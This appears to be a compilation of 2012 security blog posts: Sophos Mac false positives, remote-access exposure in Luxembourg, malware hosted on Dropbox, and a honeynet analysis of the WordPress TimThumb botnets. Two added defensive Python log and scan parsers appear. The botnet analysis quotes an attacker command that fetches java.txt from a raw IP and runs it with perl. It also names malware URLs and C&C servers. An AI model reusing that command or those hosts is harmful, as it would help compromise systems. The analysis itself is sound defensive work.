Various

10 of 10 malware detections by Sophos Anti-Virus for Mac are false positives. Are yours?


On April 24, the Sophos Naked Security blog published a post regarding malware infections on Mac OS X. Sophos claimed that 20% of Mac computers were carrying one or more instances of Windows malware. All of this malware was detected through their free Sophos Anti-Virus for Mac Home Edition.

The Flashback malware was the big story of April for Mac consumers, and every anti-virus company jumped on the opportunity to promote its products and spread propaganda about Mac OS X security. I agree with them that Mac OS X is a product like any other and also has to be protected against threats, but the proposed solutions are worse than doing nothing.

During my tests of Sophos Anti-Virus for Mac Home Edition, 10 of 10 malware detections were false positives, harassing me with constant alert pop-ups during regular operations, Spotlight indexing and Time Machine backups. Below is a sample of 10 “infections” detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to the binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos itself is a trojan, and some iTunes applications and Chrome are backdoored, and nobody knew about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is very well-known backdoored software, and once more Sophos itself contains a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

Once more Sophos is a trojan, and now my Spotlight index files also contain a backdoor.

/Library/Preferences/com.sophos.sav.plist
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O

VLC contains an IRC bot; gotcha, remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

Once more VLC, which contains a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A

Everybody knows that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B

Help, my logs contain trojans, and Sophos once more.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight index contains dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Huh, my Metasploit screenshots contain trojans (why not, lol), and Google Drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion, Sophos is stronger at marketing and frightening consumers than at creating a good Mac anti-virus that really detects something.

Luxembourg Critical Remote Management Applications Attack Surface


The MS12-020 patch has now been out for a month, with associated DoS PoCs available to pen testers and to other populations that do not share the same ethics. Many articles and blog posts have been written about CVE-2012-0002, a vulnerability discovered by Luigi Auriemma in May 2011, reported to ZDI in August 2011 and disclosed in a coordinated manner in March 2012.

One of these MS12-020 related articles was written by Dan Kaminsky, “RDP and the Critical Server Attack Surface”. This blog post reminds us that some applications are more critical than others due to their roles and their exposure to the Internet.

Dan scanned around 300 million IPs, representing around 8.3% of the Internet, and 415 thousand of them showed an open RDP port (3389/TCP), a ratio of 0.14%. By extrapolation, Dan arrived at around 5 million RDP endpoints on the Internet. Fortunately for the Internet community (should I say for the sysadmins?), despite the efforts of security researchers (mostly on freenode #ms12-020), MS12-020 has “only” led to a DoS exploit. Potentially 5 million BSoDs (Blue Screen of Death); is it a blessing in disguise?

In his article, Dan Kaminsky also reminds us that other critical server attack surfaces exist on the Internet, such as TCP/IP, HTTP, SSL, SSH, DNS or SMTP, and that all of these applications potentially play essential roles for business.

I have done the same study for the Luxembourg landscape, with around 550 000 IP addresses, but before giving my results I would like to explain what Luxembourg is :)

If you don’t know, Luxembourg has the highest GDP in Europe and is classified in the top 3 of the list of countries by GDP per capita (Wikipedia source). Also, more than 90% of the population uses the Internet and 82% of the population connects to the Internet daily. Luxembourg became the geography with the highest ratio of malicious email activity in February 2012, according to the Symantec Intelligence Report.

Luxembourg also has a total balance sheet of EUR 776 billion in credit institutions, and the Luxembourg banking sector comprises 143 credit institutions from over 20 different countries (PwC Luxembourg source). All of these credit institutions are under the supervision of the CSSF (Commission de Surveillance du Secteur Financier), and most of them delegate their IT management to PSF (Professionals of the Financial Sector), also known as “Primary IT systems operators” and “Secondary IT systems and network operators”.

In conclusion, most of the IP addresses assigned to Luxembourg have a potentially high asset value for bad guys. Luxembourg IP address ranges assigned to Internet broadband access surely offer a bigger return on investment than those of other countries in the case of phishing or malware campaigns. Also, IP address ranges assigned to professionals of the financial sector surely host e-banking or fund transaction infrastructures, a prime target for cyber crime.

So, what are the results for Luxembourg, a country that normally should have a lower ratio of exposure than others, given that one of its IP addresses has a higher asset value than 300 million arbitrarily scanned addresses? I have only focused on applications equivalent to RDP; these applications are known as “Remote Access Services” (RDP, ssh, telnet, VNC, PCAnywhere, Citrix, etc.).

In the “2012 Verizon Data Breach Report”, “Remote Access Services” are noted “as continuing their rise in prevalence, as hacking vector, accounting for 88% of all breaches leveraging hacking techniques – more than any other vector”. Remote services accessible from the entire Internet, combined with unpatched applications and default, weak or stolen credentials, continue to plague organizations. Scripted attacks seeking victims with known remote access ports, followed by the issuance of known default vendor credentials, allow targets of opportunity to be discovered and compromised in an automated and efficient manner.

Remember, Dan Kaminsky found a ratio of 0.14% of open RDP on 300 million IPs. In Luxembourg, this ratio is 0.26%, twice Dan’s ratio. For ssh the ratio of open ports is 0.79%, for telnet the ratio is 0.31% (still open telnet despite best practices?), for VNC the ratio is 0.06% and for PCAnywhere the ratio is 0.02% (still open PCAnywhere despite the leaked source code?).
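As an added example (not code from the original post or from Dan Kaminsky's study), here is the exposure-ratio computation behind the numbers above, applied to a scan of one's own address ranges: it parses nmap grepable output (the sample below is constructed), counts hosts with each Remote Access Service port open, turns them into ratios and reproduces the extrapolation step. The port-to-service mapping is the conventional one and is an assumption of this example.

```python
"""Exposure ratios of Remote Access Services from a port scan of one's own
address ranges, the computation behind the RDP/ssh/telnet/VNC/PCAnywhere
ratios above. Input is nmap -oG (grepable) output; the lines below are a
constructed sample, not real scan data."""
import re

# Conventional TCP ports of the Remote Access Services compared in the post (assumed).
REMOTE_ACCESS_PORTS = {3389: "RDP", 22: "ssh", 23: "telnet",
                       5900: "VNC", 5631: "PCAnywhere"}

# Constructed nmap -oG sample: 6 scanned addresses, one down, one filtered.
SAMPLE_SCAN = """\
# Nmap scan initiated (constructed sample)
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 3389/open/tcp//ms-wbt-server///
Host: 192.0.2.11 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///
Host: 192.0.2.12 ()\tPorts: 22/open/tcp//ssh///, 5900/open/tcp//vnc///
Host: 192.0.2.13 ()\tStatus: Down
Host: 192.0.2.14 ()\tPorts: 22/filtered/tcp//ssh///, 443/open/tcp//https///
Host: 192.0.2.15 ()\tPorts: 5631/open/tcp//pcanywheredata///
# Nmap done (constructed sample)
"""

HOST_RE = re.compile(r"^Host: (\S+)")
OPEN_RE = re.compile(r"(\d+)/open/tcp")

def count_exposed_hosts(grepable_text):
    """{service: number of distinct hosts with that port open}. Only 'open'
    counts; 'filtered' does not, matching how 'open RDP' is counted."""
    exposed = {name: set() for name in REMOTE_ACCESS_PORTS.values()}
    for line in grepable_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines
        for port in OPEN_RE.findall(line):
            name = REMOTE_ACCESS_PORTS.get(int(port))
            if name:
                exposed[name].add(m.group(1))
    return {name: len(hosts) for name, hosts in exposed.items()}

def exposure_ratios(counts, addresses_scanned):
    """Percentage of scanned addresses exposing each service."""
    return {name: 100.0 * n / addresses_scanned for name, n in counts.items()}

def extrapolate(ratio_percent, population):
    """Scale a measured ratio to a larger population: Dan Kaminsky's step from
    0.14% of 300 million IPs (8.3% of the Internet) to ~5 million RDP hosts."""
    return round(ratio_percent / 100.0 * population)

if __name__ == "__main__":
    counts = count_exposed_hosts(SAMPLE_SCAN)
    for name, pct in exposure_ratios(counts, addresses_scanned=6).items():
        print(f"{name:10s} {counts[name]} hosts  {pct:6.2f}%")
    # The post's Luxembourg RDP ratio applied to its ~550 000 addresses
    print("RDP endpoints in Luxembourg, approx.:", extrapolate(0.26, 550_000))
```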

Shouldn’t Luxembourg have lower ratios of open ports for “Remote Access Services”? I think YES. But why are these ratios so high? Surely because Security has failed in its mission, surely because Security is still understood as a technical game and not as insurance to protect the value of assets. Maybe the cause is also that the Internet is growing too fast and that its growth speed doesn’t leave time to learn from errors. Maybe the Internet distorts reality, memory and time.

Just as a reminder, a small list of vulnerabilities or backdoors that have targeted these critical remote server surfaces:

2012:
  • SSH: cisco-sa-20120328-ssh – Cisco IOS Software Reverse SSH Denial of Service Vulnerability
  • RDP: CVE-2012-0002 – Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
  • PCAnywhere: OSVDB-79412 – PCAnywhere 12.5.0 build 463 Denial of Service

2011:
  • Telnet: CVE-2011-4862 – FreeBSD Telnet Service Encryption Key ID Buffer Overflow
  • FTP: OSVDB-73573 – vsftpd-2.3.4 backdoor
  • SSH: EDB-ID-17462 – OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

2010:
  • SMTP: CVE-2010-4344 – Exim4 <= 4.69 string_format Function Heap Buffer Overflow
  • FTP: OSVDB-69562 – ProFTPD 1.3.3c compromised source remote root Trojan
  • FTP: CVE-2010-3867 – ProFTPD IAC Remote Root Exploit
  • FTP: OSVDB-62134 – Easy FTP Server v1.7.0.11 Multiple Commands Remote Buffer Overflow Exploit (Post Auth)

2009:
  • FTP: CVE-2009-3023 – Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

2008:
  • DNS: CVE-2008-1447 – Remote DNS Cache Poisoning Flaw Exploit
  • SSH: CVE-2008-0166 – Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

Etc., etc.

Should Dropbox be Shut Down for Spreading Mass Malware?


Blog posts on Symantec and ThreatPost have pointed out that Dropbox is used by bad guys to spread spam and phishing campaigns and also malware. All of this malware, and the files used in phishing and spamming campaigns, come from the “Public Folder” of malicious Dropbox accounts. Any file put in this folder gets its own Internet link so that it can be shared with others. Examples of malware spread by Dropbox:

http://dl.dropbox.com/u/58336523/x/login.php, PHP/IRCBOT used in remote file inclusion campaigns.

http://dl.dropbox.com/u/63038576/Script.exe, WORM/Ainslot.A.1946 used in infection campaigns.

The problem is that Dropbox has not been spreading malware for just a few days. If you take a look at the Clean MX database, Dropbox has been present since 2010-04-19, with an explosion of malware in 2011. The fact that Dropbox spreads malware is real, and it has been the case for a long time. Dropbox has also been present in the Malc0de database since 2012-02-26.

Compared to other malware spreaders, Dropbox has a privileged status. For example, in November 2011, FileAve.com, a free file hosting provider notorious for spreading thousands of malware samples, was shut down after years of activity. FileAve.com provided 50 MB of free storage and a free subdomain for each created account (e.g. http://yourname.fileave.com). FileAve.com had been present in the Clean MX database since 2007-11-30, in the Malc0de database since 2010-01-11 and in our database since 2009-02-16. The shutdown of FileAve.com was good news for everyone.

We can ask ourselves a legitimate question: should Dropbox be shut down, as FileAve.com was? Aren’t they both malware spreaders?

WordPress TimThumb Botnets Spread Status


Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as a botnet recruitment vector and has now spread across multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs’ visitors, diffusion of spam and phishing campaigns, DDoS, hacking of other web sites (such as the About.us domain name registrar), etc. Some of these infected WordPress installations were controlled by well-known C&C servers used and shared by black hats from around the world.

We are soon six months after the discovery of the vulnerability, and a status report on the WordPress TimThumb botnets can be done. Are the botnets still active, are fewer WordPress blogs vulnerable, is the peak of the spread over? We will try to answer these questions through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our Honey Net. The data collected through our Honey Net represents only a small part of the real activity of the WordPress TimThumb botnets, but it can also serve as an extrapolation of the real activities.

List of all detected infected domains

You can find in the following table the complete list of all detected infected domains that were called during the WordPress TimThumb RFI attack, with the domain’s associated IP address, the country where the blog was hosted, the number of distinct source IPs that called the related domain during the RFI attack and the lifetime of the domain name.

We have a total of 202 affected domains. “blogger.com.dollhousedelights.com”, hosted in Vietnam, was the affected domain called by the most distinct source IPs (258), followed by “picasa.com.xpl.be” with 152 distinct source IPs, and in third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

“picasa.com.xpl.be” and “picasa.computergoogle.co.cc” have the longest lifetime with 105 days, followed by “wordpress.com.hostdail.com” and “blogger.com.pasbar.com” with 72 days.
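As an added example, not part of the original post or its Honey Net tooling, here is how the per-domain columns above (distinct source IPs, first and last seen) can be derived from web server logs: it extracts TimThumb requests whose src= host only pretends to be an allowed site, the pattern behind names like blogger.com.dollhousedelights.com. The log lines are constructed, the allowed-site list is an assumed subset of TimThumb's defaults, and the prefix-match description of the flaw is this example's assumption.

```python
"""Distinct source IPs per payload-hosting domain in TimThumb RFI attempts
(the per-domain columns above), from Apache combined-log lines. The sample
is constructed. Assumed flaw detail: TimThumb accepted any src= host that
merely started with an allowed domain, e.g. blogger.com.dollhousedelights.com."""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Assumed subset of the domains TimThumb 1.x trusted by default.
ALLOWED_SITES = ("blogger.com", "wordpress.com", "picasa.com", "img.youtube.com")

# Constructed sample: hostnames and /.mods/ paths follow the post, IPs are TEST-NET.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2011:18:55:02 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://blogger.com.dollhousedelights.com/.mods/sh.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [05/Nov/2011:18:55:05 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://blogger.com.dollhousedelights.com/.mods/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Nov/2011:07:37:15 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/sh.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Nov/2011:03:35:03 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://picasa.com.xpl.be/.mods/sh.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
192.0.2.44 - - [28/Nov/2011:03:40:00 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+"')

def spoofed_allowed_host(host):
    """Allowed domain that `host` impersonates, or None when host is that
    domain itself or a genuine subdomain of it (the hardened check)."""
    for site in ALLOWED_SITES:
        if host == site or host.endswith("." + site):
            return None
        if host.startswith(site + "."):
            return site
    return None

def parse_rfi_attempts(log_text):
    """Yield (source_ip, timestamp, remote_host) for timthumb.php requests
    whose src= host only pretends to be an allowed site."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src_ip, ts, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("timthumb.php"):
            continue
        src = parse_qs(url.query).get("src", [""])[0]
        host = urlsplit(src).hostname or ""
        if spoofed_allowed_host(host):
            yield src_ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), host

def sources_per_domain(log_text):
    """{remote_host: (distinct source IPs, first seen, last seen)}."""
    ips, first, last = {}, {}, {}
    for src_ip, ts, host in parse_rfi_attempts(log_text):
        ips.setdefault(host, set()).add(src_ip)
        first[host] = min(first.get(host, ts), ts)
        last[host] = max(last.get(host, ts), ts)
    return {h: (len(ips[h]), first[h], last[h]) for h in ips}

if __name__ == "__main__":
    for host, (n, seen, until) in sources_per_domain(SAMPLE_LOG).items():
        print(f"{host:40s} {n:3d} source IPs  {seen:%Y-%m-%d} .. {until:%Y-%m-%d}")
```

The legitimate img.youtube.com request in the sample is deliberately excluded, which is the distinction a hardened allowed-host check (exact match or real subdomain) makes.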

Infected blogs country distribution

You can find in the following graphs (Chart1, Chart2) the geographic distribution of the infected blogs.

We have a total of 31 different countries for 202 affected domains. The United States is in first position with 58.9% (129) of all infected blogs, followed by Australia, Canada and the United Kingdom with 3.7% (8) of all infected blogs each.

Infected blogs country distribution by number of source IPs

You can find in the following graphs (Chart3, Chart4) the geographic distribution of the infected blogs by number of distinct source IPs that called them.

We have a total of 1734 distinct source IPs for 202 affected domains and 31 different hosting countries. The United States is in first position with 48.5% (841), followed by Vietnam with 14% (243), Indonesia with 4.7% (82) and Taiwan with 4.1% (71).

Timeline by day of infected blog calls and source IPs

You can find in the following timeline (Chart5) a representation by day of the number of infected blog calls and source IPs.

November 2011 was the most active month for the number of source IPs, and in December the number of source IPs drastically decreased. You can see that during the first half of November the number of infected blog calls increased day after day, and since 22 November the number of infected blogs has stabilized but is not decreasing.

Geographic timeline by day of all source IPs

In this geographic time map we load data from a Google Spreadsheet (published here). This data comes from our HoneyNet and represents the geographic WordPress TimThumb botnet activities from 15-09-2011 to 03-12-2011.

AfterGlow representation of the WordPress TimThumb botnets

By clicking on the following link, you can download an AfterGlow representation of the WordPress TimThumb botnets with links between the nodes.

Conclusion

WordPress TimThumb botnets are still infecting new blogs, but the associated activities have been decreasing since the second half of December. Maybe black hats are still on holiday :) My personal opinion is that we will still continue to hear about these botnets throughout 2012.

gangbang.mytijn.org Malware Spreader Down


By analyzing the payloads and associated C&C servers used by the WordPress TimThumb botnets, I found an interesting C&C server named “gangbang.mytijn.org”. In collaboration with Luxembourg CIRCL, the domain gangbang.mytijn.org has been down since 14 December 2011. This C&C server was known for spreading tonnes of malware on the Internet.

The initially infected WordPress sites were:

  • 222.255.77.90 – AS7643 – Vietnam

This infected server was first seen on 2011-11-05 18:54:22 and last seen on 2011-11-28 05:05:55. 214 distinct source IPs called malware hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.com, img.youtube.com.dollhousedelights.com and blog.ssis.edu.vn.

blogger.com.dollhousedelights.com spread 2 different malware samples (PHP backdoors):

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-05 18:55:02
/.mods/index.php - MD5: 51ad7df89f3e7162128b9d642a7ec75b - First seen the 2011-11-05 18:55:05

img.youtube.com.dollhousedelights.com spread 4 different malware samples:

/.mods/sh.php - MD5: b545d6934b776026e6bbfd1f7ef4bb27 - First seen the 2011-11-17 07:37:15
/.mods/sh.php - MD5: acbc38367ffd62c42e1ae20c24890b55 - First seen the 2011-11-23 01:50:04
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-27 23:50:04
/.mods/sh.php - MD5: ec1766b6a365db5099f53c85ad2ed2f1 - First seen the 2011-11-28 02:25:04

All “sh.php” samples were PHP backdoors, and the “index.php” was a PHP IRC bot.

blog.ssis.edu.vn spread one malware sample (PHP backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-17 07:25:05

  • 192.83.167.206 – AS9505 – Taiwan

This infected server was first seen on 2011-11-28 03:30:09 and last seen on 2011-12-08 03:06:44. 71 distinct source IPs called malware hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.com, img.youtube.com.dollhousedelights.com and img.youtube.com.midislandrental.com. As you can see, blogger.com.dollhousedelights.com and img.youtube.com.dollhousedelights.com were load balanced (DNS round robin).

blogger.com.dollhousedelights.com spread 1 malware sample (PHP backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-28 03:35:03

img.youtube.com.dollhousedelights.com spread 3 different malware samples:

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-28 05:20:03
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-28 05:35:07
/.mods/sh.php - MD5: e2b94559ff0c3d9219b3a43bf6dcd8bd - First seen the 2011-11-29 07:15:03

All “sh.php” samples were PHP backdoors, and the “index.php” was a PHP IRC bot.

  • Analyzing the C&C servers

The PHP IRC bot was interesting, because it contacts the potential first C&C server. You can find the encoded and decoded versions of the PHP IRC bot on pastebin. This script also allows executing commands on the affected server and launching UDP or TCP flood attacks.

You can see that the first C&C server is gangbang.mytijn.org on port 23232/TCP and that the #wWw# channel is password protected. It is also required to present a particular nickname, ident and real name in order to be identified on the IRC server.

Also, by digging the gangbang.mytijn.org domain name at different times, we can see that the domain was load balanced using the DNS round robin method. Each IP address present in the round robin load balancing also had port 23232/TCP open.

By playing with Cuckoo Sandbox, the first C&C owners executed some commands on the sandbox, which allowed me to analyse the java.txt file.

cd /tmp && rm -rf java.txt && wget http://72.41.115.123/.mods/java.txt && chmod 755 java.txt && perl java.txt && … && rm -rf java.txt

You can also find the java.txt script on pastebin. This script connects to a second C&C server, making the first C&C only a proxy. But this script also allows executing different attacks like RFI, LFI and SQL injection, targeting specific web applications like e107, osCommerce and WordPress.

The second C&C server is known as irc.javairc.org on port 6667/TCP. Most of the affected machines were located on this IRC server.

Some funny conversations were held by the C&C owners, and all of these conversations were in Indonesian.
